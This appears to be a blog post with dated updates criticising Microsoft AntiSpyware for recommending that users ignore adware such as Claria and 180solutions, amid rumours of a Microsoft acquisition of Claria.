Update (July 8): Apparently Microsoft’s “Ignore” recommendation doesn’t reflect special treatment for Claria in anticipation of an acquisition. Instead, Microsoft recommends “Ignore” for a variety of dubious “adware” programs. Sunbelt reports that Microsoft downgraded Claria to “Ignore” on March 31 — far before acquisition talks reportedly began. A comment from Webroot’s Richard Stiennon claims that Microsoft recently recommended ignoring 180solutions, and Sunbelt adds that Microsoft also recommends ignoring WebHancer and Ezula. My subsequent testing indicates that there are plenty of other “Ignore” programs still to be uncovered. (More on this in the future.)

These odd recommendations demonstrate the misguidedness of Microsoft’s “Ignore” classification. I know of no PC technician who advises users to ignore infection with any of these programs, which give users extra ads without anything offering substantial in return. If Bill Gates sought to clean up a friend’s PC, I bet he’d want all these programs gone. Competing anti-spyware programs all recommend removal. Yet somehow Microsoft’s AntiSpyware app sees no problem.

Has Microsoft given in to vendors’ threats? Or forgotten how badly “adware” damages the Windows experience (ultimately encouraging users to switch to other platforms)? I’ve previously been impressed with Microsoft’s AntiSpyware offering; I’ve often used it and often recommended it to others. But screw-ups like this call Microsoft’s judgment into question. During this sensitive period, with Microsoft unwilling to deny the continued Claria acquisition rumors, Microsoft should be especially careful to put users’ interests first. Instead, Microsoft’s recommendations cater to the interests of the advertising industry. I’m not impressed.

Microsoft’s recently-published response to questions about Claria defends Microsoft’s treatment as the result of ordinary application of Microsoft’s usual criteria, without any special exceptiosn. Perhaps. But if this Microsoft’s criteria say to ignore a program known to be installed through fake-user interface ads on kids sites, showing a EULA only after installation, with a broken uninstaller, then Microsoft’s criteria leave a lot to be desired.

Update (July 12): ClickZ reports that Microsoft has ended acquisition talks with Claria.